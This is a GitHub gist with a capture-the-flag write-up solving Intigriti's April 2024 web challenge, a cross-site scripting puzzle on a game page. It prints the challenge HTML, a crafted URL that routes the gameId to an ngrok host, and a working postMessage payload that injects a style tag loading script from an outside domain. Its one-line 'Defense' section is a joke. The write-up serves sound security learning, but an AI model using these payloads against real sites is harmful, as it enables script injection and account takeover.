Skip to content

Instantly share code, notes, and snippets.

@Siss3l

Siss3l/0424.md

Last active April 18, 2024 01:43
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Siss3l/227ece1ecce1ef232baf6e9b22b9c1a2 to your computer and use it in GitHub Desktop.
Save Siss3l/227ece1ecce1ef232baf6e9b22b9c1a2 to your computer and use it in GitHub Desktop.
Download ZIP
Intigriti's April 2024 Web Challenge thanks to @kiredevsandhacks
Raw
0424.md

Intigriti April Challenge

  • Category: Web
  • Impact: Medium
  • Solves: 12

Challenge

Description

Find a way to execute alert(document.domain) on the challenge page.

The solution:

  • should leverage a cross site scripting vulnerability on this domain;
  • should execute alert(document.domain);
  • should not be self-XSS or related to MiTM attacks;
  • should not use another challenge on the intigriti.io domain;
  • should require no user interaction.

Overview

We have a web game challenge where we can frantically spam our spacebar key:

<html>
  <head>
    <link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Lato">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
    <title>Test Your Race Condition!</title>
  </head>
  <body style="padding:40px;">
    <h1>Test Your Race Condition!</h1>
    <section>Welcome to this gaming page! How fast are you in all games?</section><br>
    <section>
      We currently have just one game but more are in development. Check out the first game:
      <a id="gameLink" href="https://admin:debug@challenge-0424.intigriti.io/private/play.html?gameId=/challenge/game_barspacer.html">BarSpacer</a>!
    </section>
    <br>
    <section>
      If you are a developer, please check out <a href="/challenge/docs.html">the docs</a> for instructions on how to integrate your games with this website.
    </section><br>
    <section id="debug" style="display:none;">Get our server side code here (PW: intigriti):<a id="codeLink" href="/code.zip">code</a></section>
    <script>
      // our backend guys wanted to secure this but who cares about bots and hackers just add this in, until they complain
      if (decodeURIComponent(document.URL).indexOf('debug=true') !== -1) {
        codeLink.href = 'https://admin:debug@' + location.host + codeLink.pathname;
        debug.style.display = null;
      }
      gameLink.href = 'https://admin:debug@' + location.host + gameLink.pathname + '?' + gameLink.href.split('?')[1];
    </script>
  </body>
</html>

A wget command won't produce anything interesting, except for the Sorry, this app is optimized for Chromium based browser. message.

Resolution

We can take inspiration from the title, previous Intigriti challenges and some fuzzing to find a way to get there quickly.

The given errors are fairly self-explanatory so we won't dwell much on them:

https://admin:debug:%3fdebug=true&gameId=%2f%2fip.ngrok-free.app%2Fpoc.htm&1%23@challenge-0424.intigriti.io/private/play.html?gameId=/challenge/game_debug.html#@challenge-0424.intigriti.io/private/play.html?

The top.postMessage method safely enables cross-origin communication between objects, between a page and a pop-up that it spawned or between a page and an iframe embedded within it.

Therefore we launch our Ngrok-python wrapper followed by python -m http.server 1234 command to serve our payload (having regard to the above code) and get the alert popup:

<body><script>top.postMessage({nextGameId:"//challenge-0424.intigriti.io/challenge/game_debug.html#",action:"gotoNextGame"},"*");top.postMessage({nextGameId:"%</textarea><style/onload=import(/\\nj.rs/)>",action:"gotoNextGame"},"*");</script></body>

Defense

Avoid using JavaScript.

Appendix

A great way to brush up our classics! (Confer https://twitter.com/intigriti/status/1780264966752272625 for other great solutions)

Bye

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment